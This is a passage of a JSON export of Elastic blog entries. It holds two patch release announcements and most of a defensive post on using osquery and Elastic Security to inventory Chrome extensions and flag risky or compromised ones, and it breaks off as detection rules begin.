notes](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/8.16/new.html).\n","modular_blocks":[],"publish_date":"2025-02-11","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt38a6c014d6bd5ecb","ACL":{},"created_at":"2021-06-02T15:27:49.854Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack","label_l10n":"Stack","tags":[],"title":"Stack","updated_at":"2021-07-13T22:00:22.378Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.258Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt8836a5dda86cbfe0","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-01T15:42:09.734Z","updated_at":"2024-04-01T15:42:09.734Z","content_type":"image/png","file_size":"62454","filename":"Patch_release_dark.png","title":"Patch_release_dark.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-02T17:14:25.081Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8836a5dda86cbfe0/660ad5d11b5a5878c8adccbc/Patch_release_dark.png"},"title":"Elastic Stack 8.16.4 released","title_l10n":"Elastic Stack 8.16.4 released ","updated_at":"2025-02-10T23:38:02.395Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-8-16-4-released","publish_details":{"time":"2025-02-11T13:56:41.798Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltaeea7bf7876a2185","_version":1,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.\n","author":["blta248c27b7b7978db"],"category":["bltfaae4466058cc7d6"],"created_at":"2025-02-10T23:06:59.147Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"Version 8.17.2 of the Elastic Stack was released today. We recommend you [upgrade to this latest version](https://www.elastic.co/downloads). We recommend 8.17.2 over the previous versions 8.17.1\n\nFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to [the release notes](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/8.17/new.html).","modular_blocks":[],"publish_date":"2025-02-11","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt720a36f34ba37235","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-08T02:19:40.632Z","updated_at":"2024-04-08T02:19:40.632Z","content_type":"image/png","file_size":"59668","filename":"Patch_release_white.png","title":"Patch_release_white.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-08T20:16:44.015Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt720a36f34ba37235/6613543c0d99458bb1031dca/Patch_release_white.png"},"title":"Elastic Stack 8.17.2 released","title_l10n":"Elastic Stack 8.17.2 released ","updated_at":"2025-02-10T23:06:59.147Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-8-17-2-released","publish_details":{"time":"2025-02-11T13:56:21.841Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt68b2e9dbf6597c14","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Learn how the Elastic Infosec team created a full inventory of all browser extensions using osquery and Elastic Security with examples on building detections to alert the security team when a known bad browser extension is installed on a workstation.","author":["blt06048a64b0c2b959"],"category":["blte5cc8450a098ce5e"],"created_at":"2025-02-06T04:20:35.256Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs52b52feb2544624d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen your CISO asks if a specific browser extension has ever been installed on any of your workstations, how quickly can you get the correct answer? Malicious browser extensions are a significant threat that many organizations have no way of managing or detecting. This blog post explores how the Elastic Infosec team uses \u003c/span\u003e\u003ca href=\"https://www.osquery.io/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eosquery\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and the Elastic Stack to create a real-time inventory of all browser extensions and detection rules as well as how to notify the team if a workstation has a known compromised browser extension. This solution is built entirely using osquery, the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/integrations/current/endpoint.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Defend integration\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/siem\"\u003e\u003cspan style='font-size: 12pt;'\u003eSIEM capabilities\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e within the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elastic-stack\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Stack\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Threat actors targeting browser extensions","_metadata":{"uid":"csd04f4503e06b28af"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere has been an increased focus from threat actors in targeting browser extensions as a way to steal information or compromise users — and even some \u003c/span\u003e\u003ca href=\"https://secureannex.com/blog/cyberhaven-extension-compromise/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ethreat actors\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://cybernews.com/security/25-chrome-extensions-breached-hackers-are-after-user-data/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003edirectly target\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e the developers of legitimate extensions with the goal of adding malicious code.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith enough permissions, a browser extension has the ability to view or change any information on any website you visit with your browser and collect sensitive information passed to the websites, such as the usernames, passwords, or bank account information. Extensions could access and steal any website’s stored authentication tokens. They can even change the content of a website to socially engineer a user into downloading malware onto their workstation like changing the destination of a link, for example.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Enterprise challenges","_metadata":{"uid":"cs88dc1cd4016ed760"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eManaging browser extensions in an enterprise poses some complex challenges.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eExtensions are installed per profile within the browser.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEach user account on a workstation can have multiple different profiles within each of their browsers, such as a personal profile and a work profile.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt is common to see workstations with five or more different user profiles — each with their own set of installed extensions.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere are some options, such as managed browsers that can control the installed extensions for the corporate profiles by creating \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eallow\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e or \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eblock\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e lists for extensions, but these solutions don’t manage noncorporate profiles on those workstations. The personal browser extensions on corporate workstations still represent a risk to your company if the user logs into work systems from their personal profile. Another risk scenario is that the personal extension could dynamically change the destination of a clicked link, causing a user to download a malicious file to their work system.\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Deploy and manage osquery within Kibana","_metadata":{"uid":"cs92c686e1cb3f8fc1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eosquery is an open source agent that works on almost all modern operating systems (OS). It treats each OS like a relational database with tables that you can query to gather information about the current state of the system. You can query the 200+ tables in the\u003c/span\u003e\u003cspan style='color:rgb(64, 64, 64);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.osquery.io/schema/5.15.0/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eschema\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(64, 64, 64);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003efor information, such as running processes; installed browser extensions; Python libraries; loaded docker containers; loaded kernel modules; open network connections; connected USB devices; and many more.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt Elastic, we protect all of our workstations with our own \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/xdr\"\u003e\u003cspan style='font-size: 12pt;'\u003eXDR capabilities\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, which includes deploying Elastic Agent to all of our workstations for distributed protection and response. One of the great features of Elastic Security is the ability to easily deploy and manage osquery to your endpoints using the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/integrations/current/osquery_manager.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eOsquery Manager integration\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e within Kibana. The osquery integration is included in the Basic license — there are no additional licensing costs to deploy it within your fleet of agents.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Advantages of using osquery with Elastic","_metadata":{"uid":"cs01d4274ba84de101"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Defend and other endpoint detection and response (EDR) agents can stream real-time process, network, and file logs from a workstation. But these audit logs can’t tell you all of the information about the state of the OS,such as installed browser extensions. This is where osquery comes in. It lets us capture a snapshot of the current state of a workstation so that we know which \u003c/span\u003e\u003ca href=\"https://www.osquery.io/schema/5.15.0/#chrome_extensions\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eChrome extensions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e users have.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith a few \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/manage-osquery-integration.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eclicks\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in Kibana, you can deploy osquery to all of your workstations and manage and view your queries directly within the Elastic Stack — no extra infrastructure is required when you manage osquery with Kibana. Another advantage of using osquery with Elastic is that the results of all queries are immediately ingested into an Elasticsearch index and available for all of the various use cases. Ingesting the results into your Elastic Stack also provides you with a historic timeline of your queries, which you can use to see when hardware and software changes were made to a system over time.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style='font-size: 12pt;'\u003eFor more information about using osquery in Elastic, check out the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/osquery.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eosquery documentation guide\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Using osquery in Elastic","_metadata":{"uid":"cs8f1acc290c507fb4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWithin osquery, there are two ways to run a query — immediately as a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003elive query\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e or as part of a regularly scheduled group of queries that osquery refers to as a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003equery pack\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Live query","_metadata":{"uid":"cs56fb8e90e81dceff"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA live query will run a single query against one or more hosts. Live queries are a good way to build and refine your queries during testing or to hunt for specific indicators during an investigation. When selecting the hosts to run a live query in Elastic, you can select hosts individually, all hosts in a fleet policy, or by operating system. If an agent is offline when you run the live query, it will stay queued if the agent comes online within the next 60 minutes; otherwise, it will be cleared. A feature in the Elastic version of osquery are \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003esaved queries\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. This feature makes it easy to preconfigure commonly used complex queries that can then be used by other team members.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Query pack","_metadata":{"uid":"cs8206af5e1f023964"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA query pack is a collection of preconfigured queries that are scheduled to run at different intervals. Each query in the pack can specify which OS platform it will run on, so a single pack can be used safely on a policy with multiple OS. A query pack can be exported and imported as a .json file to allow you to quickly add a pack in Kibana. osqery provides some \u003c/span\u003e\u003ca href=\"https://github.com/osquery/osquery/tree/master/packs\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003esample packs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to get started, or you can try out the \u003c/span\u003e\u003ca href=\"https://github.com/aarju/osquery-packs-and-dashboards/blob/main/osquery%20packs/browser_monitoring.conf\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ebrowser_monitoring\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e pack we use to inventory our browser extensions.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Creating an inventory of all extensions with osquery","_metadata":{"uid":"csd3982fc5193526d0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Elastic Infosec team has configured the \u003c/span\u003e\u003ca href=\"https://github.com/aarju/osquery-packs-and-dashboards/blob/main/osquery%20packs/browser_monitoring.conf\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ebrowser_monitoring\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e pack to run every six hours on all of our workstations to create an inventory of all browser extensions. We run the queries every six hours because Elastic is a globally distributed company, and we can’t predict the working hours of our users.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1ad6623fffa998b7"}}},{"image":{"image":{"uid":"blt246e4e2e025155b6","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2025-02-06T04:06:19.151Z","created_by":"bltb6c155cd84fc0c1a","file_size":"120021","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2025-02-06T04:06:19.151Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2025-02-06T07:30:00.689Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt246e4e2e025155b6/67a4353b4405de67c64b213b/image1.png"},"_metadata":{"uid":"csd34a149f7eb147b5"},"caption_l10n":"browser_monitoring query pack ","alt_text_l10n":"browser_monitoring query pack ","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7975ce5909eda685"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBecause of the complexity that comes with multiple user profiles, the queries to collect browser extension information require a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eJOIN\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e operator to join the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eusers\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e table to the extension table. The \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eJOIN\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e operator will combine two tables together using a common field that exists in both tables. In this case, it is the user ID \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003euid\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e field.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa198e868a14c4941"}}},{"code":{"code":"SELECT * FROM users JOIN chrome_extensions USING (uid)\n","_metadata":{"uid":"csa99de922f0a5d837"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3936c2fdd773bc0d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe results from the pack queries can also be seen directly in the osquery UI with links to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/serverless/current/security-examine-osquery-results.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eopen the results\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e of each query in Kibana Discover or Lens.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs864b475af6a12bba"}}},{"image":{"image":{"uid":"bltc86339f0b6ec6495","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2025-02-06T04:06:33.774Z","created_by":"bltb6c155cd84fc0c1a","file_size":"266047","filename":"image4.png","parent_uid":null,"tags":[],"title":"image4.png","updated_at":"2025-02-06T04:06:33.774Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2025-02-06T07:30:00.678Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc86339f0b6ec6495/67a435498de79c12eab8f8d9/image4.png"},"_metadata":{"uid":"csa1990a75937f4bad"},"caption_l10n":"browser_monitoring results view ","alt_text_l10n":"browser_monitoring results view ","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs888169e767f5fab3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe results from all queries are stored directly into the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003elogs-osquery_manager.result*\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e index pattern. The results from a scheduled pack query can be found using the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eaction.id\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e field. For pack results, this field follows the naming convention of \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003epack_{pack_name}_{query_name}\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. We are using a pack named \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ebrowser-monitoring\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e with a query named \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003echrome_extensions\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. To view the results of this query, you can query for \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eaction_id: \"pack_browser-monitoring_chrome_extensions\"\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen viewing the results of the osquery in Discover you will see that each of the fields from the osquery schema \u003c/span\u003e\u003ca href=\"https://www.osquery.io/schema/5.15.0/#chrome_extensions\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003etable\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e are indexed with the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.*\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e field name. When viewing information about Chrome extensions, the fields we use most often are the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.identifier\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.name\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.permissions\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.profile\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.version\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cseadc59470eb22437"}}},{"image":{"image":{"uid":"blted71ebe6a4477742","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2025-02-06T04:06:44.332Z","created_by":"bltb6c155cd84fc0c1a","file_size":"135104","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2025-02-06T04:06:44.332Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2025-02-06T07:30:00.710Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blted71ebe6a4477742/67a435548de79c69c2b8f8dd/image2.png"},"_metadata":{"uid":"csf70faaf6a9bd6f2c"},"caption_l10n":"Example query results ","alt_text_l10n":"Example query results ","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs07feba166651e2e8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHere is a full list of the fields available in the chrome_extension query response:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eosquery.identifier\u003c/span\u003e is the unique identifier of each extension. With this identifier, you can find the extension on the Google Chrome Web Store, or look up the reputation score of the extension using a service, such as \u003c/span\u003e\u003ca href=\"http://secureannex.com\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eSecure Annex\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e or \u003c/span\u003e\u003ca href=\"http://crxaminer.tech\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003ecrxaminer.tech\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eosquery.name\u003c/span\u003e is the name of the extension as displayed in the Chrome Web Store and in your browser.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eosquery.profile\u003c/span\u003e is the Google Chrome profile that the extension is installed in. It is very common for a user to have multiple different Chrome profiles in a single-user account.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eosquery.permissions\u003c/span\u003e are the permissions granted to the extension. This field can be used to filter for extensions that are granted dangerous permissions, such as permissions to view or modify requests to every website. Pay close attention to any extensions that have permissions, such as \u003cspan data-type='inlineCode'\u003ehttps://*/*\u003c/span\u003e , which grants the extension access to every \u003cspan data-type='inlineCode'\u003ehttps\u003c/span\u003e website that you access.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eosquery.version\u003c/span\u003e is the installed version of the extension. In some cases, an extension could have one compromised version, which you want to remove.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eosquery.update_url\u003c/span\u003e is the url that the extension uses to check for any updates. If this value is anything other than the standard update path of \u003cspan data-type='inlineCode'\u003ehttps://clients2.google.com/service/update2/crx\u003c/span\u003e, then the extension has been ‘sideloaded’ or installed in some way other than the standard web store and should be investigated.\u0026nbsp;\u003c/span\u003e\u003cbr /\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAnother very important osquery table is the \u003c/span\u003e\u003ca href=\"https://www.osquery.io/schema/5.15.0/#chrome_extension_content_scripts\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003echrome_extension_content_scripts\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This table contains information about each of the javascript files being used by the extensions. If you find that there is a compromised extension on a host, you can use the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.path\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.match\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eosquery.script\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e fields from this table to find the full path of each script run by the extension. With this information you can use Elastic Defend’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/response-actions.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eresponse action\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e capabilities to download those files for offline analysis.\u0026nbsp;\u003c/span\u003e \u003c/p\u003e\u003c/p\u003e"},{"title_l10n":"Creating detection rules for bad extensions","_metadata":{"uid":"cse50b852c1738a0ea"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow that you have a live inventory of all browser extensions you can build detections. The most straightforward detection to build is one for known bad extensions. The known bad extension list will likely come from a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/integrations/current/threat-intelligence-intro.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ethreat intelligence\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e report containing known identifiers and versions. For this example, we are going to use the threat intel from the recently reported \u003c/span\u003e\u003ca href=\"https://secureannex.com/blog/cyberhaven-extension-compromise/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eCyberhaven extension 